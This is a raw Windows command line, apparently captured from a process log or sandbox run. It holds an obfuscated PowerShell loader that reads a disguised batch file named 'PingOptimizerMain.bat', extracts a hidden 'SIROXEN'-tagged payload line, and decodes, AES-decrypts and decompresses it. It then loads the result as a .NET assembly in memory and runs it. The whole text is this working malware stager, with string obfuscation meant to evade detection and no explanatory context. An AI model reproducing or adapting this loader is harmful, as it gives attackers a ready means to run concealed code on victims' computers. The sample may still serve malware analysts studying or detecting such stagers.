C:\Windows\system32\cmd.exe /S /D /c" echo function JKKyH($CkPBl){ $vgKjD=[System.Security.Cryptography.Aes]::Create(); $vgKjD.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vgKjD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vgKjD.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('26aOJFwTv97uDv+AU5goDn6hWx02gD9NOcdrvlCWKTI='); $vgKjD.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('It4ny7WARKm8v2w/mmx4aw=='); $IogOR=$vgKjD.CreateDecryptor(); $return_var=$IogOR.TransformFinalBlock($CkPBl, 0, $CkPBl.Length); $IogOR.Dispose(); $vgKjD.Dispose(); $return_var;}function HyrXz($CkPBl){ $gYrBV=New-Object System.IO.MemoryStream(,$CkPBl); $DaoGF=New-Object System.IO.MemoryStream; Invoke-Expression '$YOItl #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$gYrBV,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $YOItl.CopyTo($DaoGF); $YOItl.Dispose(); $gYrBV.Dispose(); $DaoGF.Dispose(); $DaoGF.ToArray();}function LrqQP($CkPBl,$BYqCB){ $nHbiH = @( '$dWXPX = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$CkPBl);'.Replace("#", ""), '$bnVJm = $dWXPX.EntryPoint;', '$bnVJm.Invoke($null, $BYqCB);' ); foreach ($bEYpH in $nHbiH) { Invoke-Expression $bEYpH };}$JVYeU=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat').Split([Environment]::NewLine);foreach ($gjKds in $JVYeU) { if ($gjKds.StartsWith('SIROXEN')) { $QeetH=$gjKds.Substring(7); break; }}$tkNud=HyrXz (JKKyH ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($QeetH)));LrqQP $tkNud (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\PingOptimizerMain.bat')); "